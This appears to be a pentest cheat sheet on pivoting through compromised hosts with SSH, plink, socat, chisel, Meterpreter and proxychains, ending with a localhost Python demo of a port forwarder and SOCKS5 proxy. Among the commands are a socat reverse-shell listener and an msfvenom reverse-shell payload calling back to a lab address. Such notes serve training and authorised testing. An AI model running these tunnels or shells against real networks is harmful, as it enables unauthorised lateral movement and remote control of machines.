Pivoting

Local port forwarding
Listen on a port on your own machine; each connection is carried over the SSH session to <gateway>, which opens it to <remote host>:<remote port> (an address the gateway can reach, even if you cannot)
ssh <gateway> -L <local port to listen>:<remote host>:<remote port>

Remote port forwarding
Listen on a port on the gateway; each connection there is carried back over the SSH session to your machine, which opens it to <local host>:<local port>. sshd binds such listeners to the gateway's loopback only, unless GatewayPorts is enabled in its sshd_config
ssh <gateway> -R <remote port to bind>:<local host>:<local port>

Dynamic port forwarding
Start a SOCKS4/5 proxy on your machine; every connection sent to it is opened from <target>. -p is the port the SSH daemon on <target> listens on (22 by default), not a port being forwarded
ssh -D <local proxy port> -p <ssh port> <target>

SOCAT

socat file:`tty`,raw,echo=0 tcp-listen:8989

This one is not a pivot: it is the listener half of a fully interactive reverse shell. Run it on Kali, then have the target connect back to port 8989 with socat's exec option running a shell plus pty,stderr,setsid,sigint,sane. The raw,echo=0 on your side hands the target's pty your terminal, so tab completion, Ctrl-C and editors work without the python pty upgrade dance

PORT FORWARDING "port to port":

----MSF---- Most platforms

Forward: get a meterpreter session on one of the dual-homed machines, then in that session run portfwd add -l 4445 -p 4443 -r ip (Kali listens on 4445; each connection is carried through the session and opened by the compromised host to ip:4443, an address only it can reach). Use -R to make it a reverse forward: the compromised host listens and connections are carried back to Kali

----SSH---- For Linux

~C: if you already have an SSH session, press Enter and then ~C to get the ssh> prompt, where -L and -R forwards can be added to the live session without reconnecting. The two examples below assume the session was opened from the compromised host to Kali (as in the last command of this section), so the "remote" end is Kali and the "local" end is the compromised host

-R 8081:172.24.0.2:80 (Kali listens on 8081; connections are carried to the compromised host, which opens them to 172.24.0.2:80)

:8081<------------:80 Now you can reach 172.24.0.2:80 from Kali as 127.0.0.1:8081, which you didn't have direct access to

-L 8083:<Kali IP>:8084 (the compromised host listens on 8083; connections are carried back to Kali, which opens them to its own port 8084)

:8084<------------:8083<------------:XXXX Run nc -lvnp 8084 on Kali; if a second target sends a reverse shell to <compromised host>:8083, you receive it on Kali

For the reverse shell: msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.1.1.230 LPORT=8083 -f elf -o shell (LHOST is the compromised host's address as seen from the second target, and a Linux payload needs -f elf, not -f exe). Run it on the second target to get a shell on Kali

Or, if you don't have an SSH session yet, SSH to your Kali from the target machine. On Kali: service ssh start, then create a throwaway user and give it /bin/false (or /usr/sbin/nologin) as its shell in /etc/passwd, so the account can only be used for forwarding. On the target: ssh -N -R 12345:192.168.122.228:5986 test@10.1.1.1 (-N requests no shell, which is what a shell-less account needs; Kali then reaches 192.168.122.228:5986, WinRM over HTTPS, as 127.0.0.1:12345)

---PLINK---- Just like SSH, on Windows. On Kali: service ssh start, then transfer /usr/share/windows-binaries/plink.exe to the target machine

On Target: plink.exe -l KALIUSER -pw PASS -P 22 -C -N -L 0.0.0.0:4445:ip:4443 <Kali IP> (the target listens on 4445 on every interface, so other internal hosts can connect to it, and each connection is carried over the SSH session to Kali, which opens it to ip:4443; -C compresses, -N asks for no shell). The first connection has to accept Kali's host key, and that prompt blocks a non-interactive session, so prefix the command with echo y | the first time. Use -R instead of -L to make Kali the listening side, as with ssh

---SOCAT---- For Linux

Forward your 8083 to ip:443: ./socat TCP4-LISTEN:8083,fork TCP4:ip:443 (listen on 8083 on all interfaces; fork relays each client in its own child so several can connect at once; add ,reuseaddr to the listen side if you need to restart it right after a connection). This runs on the pivot host, so the listener is exposed to whatever can reach the pivot

---CHISEL---- Most platforms

Remote static tunnels "port to port":

On Kali "reverse proxy listener": ./chisel server -p 8000 --reverse (--reverse is what allows clients to request R: remotes, i.e. listeners on the Kali side; without it they are rejected)

General command: ./chisel client <server ip>:<server port> [R:]<local host>:<local port>:<remote host>:<remote port>
Without the R: prefix the client (the target) listens on local host:port and the server (Kali) opens the connection to remote host:port; with R: the server (Kali) listens and the client (the target) opens the connection. <local host> defaults to 0.0.0.0 (all interfaces) when left out

Remote tunnels "access IP:PORT you couldn't access before": On Target: ./chisel client <Kali IP>:8000 R:127.0.0.1:8001:172.19.0.3:80 (Kali now reaches 172.19.0.3:80 as 127.0.0.1:8001; binding the listener to 127.0.0.1 keeps the tunnel entrance off Kali's other interfaces)

Local tunnels "listen on the target for something, and send it to us": On Target: ./chisel client 10.1.1.1:8000 9001:127.0.0.1:8003 (the target listens on 9001 on all interfaces; whatever connects there, e.g. a reverse shell from a second internal host, is delivered to Kali at 127.0.0.1:8003, where your nc listener waits)

DYNAMIC "port to any": set up proxychains with a socks5 line for 127.0.0.1:1080 in /etc/proxychains4.conf (or /etc/proxychains.conf for the older version), or set a SOCKS5 proxy of 127.0.0.1:1080 in Firefox. The proxies below carry TCP connections only, so for nmap use -Pn -sT (no host discovery, full connect scans; SYN, UDP and ICMP probes cannot pass through a SOCKS proxy) or use the TCP port scanner module in msf, which scans through the session's routes itself

----MSF---- Most platforms

Get a meterpreter session on one of the dual-homed machines, route the internal subnet through it (post/multi/manage/autoroute, or run autoroute -s <subnet> inside the session), then start the SOCKS proxy (auxiliary/server/socks4a on older Metasploit; newer versions merged it into auxiliary/server/socks_proxy, where VERSION selects 4a or 5). It listens on 1080 by default, and traffic sent to it for a routed subnet goes out through the session

----SSH---- For Linux

ssh -D 1080 <gateway> (or add -D 1080 at the ~C prompt of an existing session): SOCKS4/5 proxy on Kali's 127.0.0.1:1080, with every connection opened from the gateway. If the session runs the other way, from the target to Kali, use -R 1080 with no destination (OpenSSH 7.6 or later on the client side): the listener then sits on Kali's 127.0.0.1:1080 and the target opens the connections

---PLINK--- Just like SSH, on Windows

On Target: plink.exe -l KALIUSER -pw PASS -P 22 -C -N -D 1080 <Kali IP>. Caveat: as with ssh, -D puts the SOCKS listener on the machine running the client (here the target, on its own 127.0.0.1:1080) and opens the proxied connections from the SSH server (Kali), so run this way it gives Kali no path into the target's network. Through a Windows pivot, forward the ports you need one at a time with -R (see the plink line above), or use chisel or the msf route for a real dynamic pivot

---CHISEL---- Most platforms

On Kali: ./chisel server -p 8000 --reverse

On Target: ./chisel server -p 8001 --socks5 (a chisel server on the target with its built-in SOCKS5 proxy enabled; for now only reachable from the target itself), then ./chisel client <Kali IP>:8000 R:8001:127.0.0.1:8001 (Kali's 127.0.0.1:8001 now leads to that server on the target; the R: remote must point at the port the second chisel server listens on)

On Kali: ./chisel client 127.0.0.1:8001 socks (opens the SOCKS5 proxy on Kali's 127.0.0.1:1080, ready for proxychains). Newer chisel makes this a single hop: with the Kali server started with --reverse, run ./chisel client <Kali IP>:8000 R:socks on the target and the Kali server exposes the SOCKS5 proxy itself on 127.0.0.1:1080, with the target opening the connections
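Both mechanisms on this page, the static "port to port" forward (socat with fork, plink -L, a chisel remote) and the dynamic SOCKS proxy (ssh -D, plink -D, chisel socks, the msf socks module), reduced to their TCP essentials. This is an added example written for this page, not code from the cheat sheet or from any of those tools: forward_to is the static relay, handle is a SOCKS5 server that supports only the no-auth method and the CONNECT command (which is exactly why nmap through such a proxy needs -sT -Pn: SYN and ICMP probes never enter it), and socks5_connect is the handshake proxychains performs on a program's behalf. Everything binds 127.0.0.1 ephemeral ports, a constructed echo service stands in for the internal host, and those addresses and all function names are the example's own assumptions.

```python
"""Static port-to-port TCP forwarder and a minimal SOCKS5 CONNECT proxy with its
client-side handshake. Added example, not from the original cheat sheet; the echo
service and every 127.0.0.1 port here are constructed for the demo."""
import socket
import threading
from contextlib import suppress

def read(sock, n):  # exactly n bytes; needs a blocking socket so MSG_WAITALL is honoured
    buf = sock.recv(n, socket.MSG_WAITALL)
    if len(buf) != n:
        raise ConnectionError("peer closed mid-message")
    return buf

def pump(src, dst):  # relay src -> dst until EOF, then half-close dst so the EOF propagates
    with suppress(OSError):
        while data := src.recv(4096):
            dst.sendall(data)
    with suppress(OSError):
        dst.shutdown(socket.SHUT_WR)

def relay(a, b):  # full duplex: run both directions until each side has sent its EOF
    back = threading.Thread(target=pump, args=(b, a), daemon=True)
    back.start()
    pump(a, b)
    back.join()

def serve(handler):  # listen on 127.0.0.1:<ephemeral>, one thread per client; returns the port
    srv = socket.create_server(("127.0.0.1", 0))
    def loop():
        with suppress(OSError):
            while True:
                threading.Thread(target=handler, args=(srv.accept()[0],), daemon=True).start()
    threading.Thread(target=loop, daemon=True).start()
    return srv.getsockname()[1]

def forward_to(host, port):  # "port to port" (socat fork, plink -L, chisel remote): one fixed target
    def handler(client):
        with suppress(OSError), client, socket.create_connection((host, port), timeout=5) as up:
            relay(client, up)           # if the target refuses, the client just sees EOF
    return handler

def reply(client, rep):  # VER REP RSV ATYP=IPv4 BND.ADDR BND.PORT, address zeroed
    client.sendall(bytes([5, rep, 0, 1]) + bytes(6))

def handle(client):  # one SOCKS5 session: method negotiation, CONNECT request, relay
    with suppress(OSError), client:
        ver, nmethods = read(client, 2)
        if ver != 5 or 0 not in read(client, nmethods):     # only "no auth" is offered
            return client.sendall(b"\x05\xff")
        client.sendall(b"\x05\x00")
        _ver, cmd, _rsv, atyp = read(client, 4)
        if atyp == 1:                                       # IPv4 literal
            host = socket.inet_ntoa(read(client, 4))
        elif atyp == 3:                                     # hostname: resolved here, on the proxy side
            host = read(client, read(client, 1)[0]).decode()
        else:
            return reply(client, 8)                         # IPv6 not handled in this demo
        port = int.from_bytes(read(client, 2), "big")
        if cmd != 1:                                        # BIND / UDP ASSOCIATE: unsupported
            return reply(client, 7)
        try:
            upstream = socket.create_connection((host, port), timeout=5)
        except OSError:
            return reply(client, 5)                         # connection refused
        with upstream:
            reply(client, 0)
            relay(client, upstream)

def socks5_connect(proxy_port, host, port):
    """Client side (what proxychains does for a program): no-auth greeting, then
    CONNECT with ATYP=3 so the proxy resolves the name. Returns (rep, socket)."""
    s = socket.create_connection(("127.0.0.1", proxy_port))   # blocking, see read()
    s.sendall(b"\x05\x01\x00")
    if read(s, 2) != b"\x05\x00":
        return 0xFF, s.close()
    s.sendall(b"\x05\x01\x00\x03" + bytes([len(host)]) + host.encode() + port.to_bytes(2, "big"))
    rep = read(s, 4)
    addr_len = {1: 4, 4: 16}.get(rep[3]) or read(s, 1)[0]  # ATYP 1/4 fixed, 3 length-prefixed
    read(s, addr_len + 2)                                   # skip BND.ADDR and BND.PORT
    return (0, s) if rep[1] == 0 else (rep[1], s.close())

def echo(conn):  # constructed "internal" service: echo until EOF
    with conn:
        pump(conn, conn)

def exchange(s, payload):  # send payload, half-close, collect the reply until EOF
    with s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)
        return b"".join(iter(lambda: s.recv(4096), b""))

def demo(payload):  # static forward, SOCKS CONNECT, then CONNECT to a port nobody listens on
    hidden, proxy = serve(echo), serve(handle)
    fwd = serve(forward_to("127.0.0.1", hidden))
    forwarded = exchange(socket.create_connection(("127.0.0.1", fwd), timeout=5), payload)
    proxied = exchange(socks5_connect(proxy, "127.0.0.1", hidden)[1], payload)
    with socket.create_server(("127.0.0.1", 0)) as probe:   # bind, then close: no listener left
        dead = probe.getsockname()[1]
    return forwarded, proxied, socks5_connect(proxy, "127.0.0.1", dead)[0]
```

demo(b"...") returns three things: the bytes echoed back through the static forward, the bytes echoed back through the SOCKS CONNECT, and the REP code the proxy answers for a CONNECT to a port with no listener (5, connection refused, instead of silently dropping the client the way the static forward does). Sending the destination as ATYP=3, a name string, makes the proxy resolve it rather than the client; that is the "a" in socks4a and the reason proxy_dns matters in proxychains.conf when a hostname only resolves inside the pivoted network.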
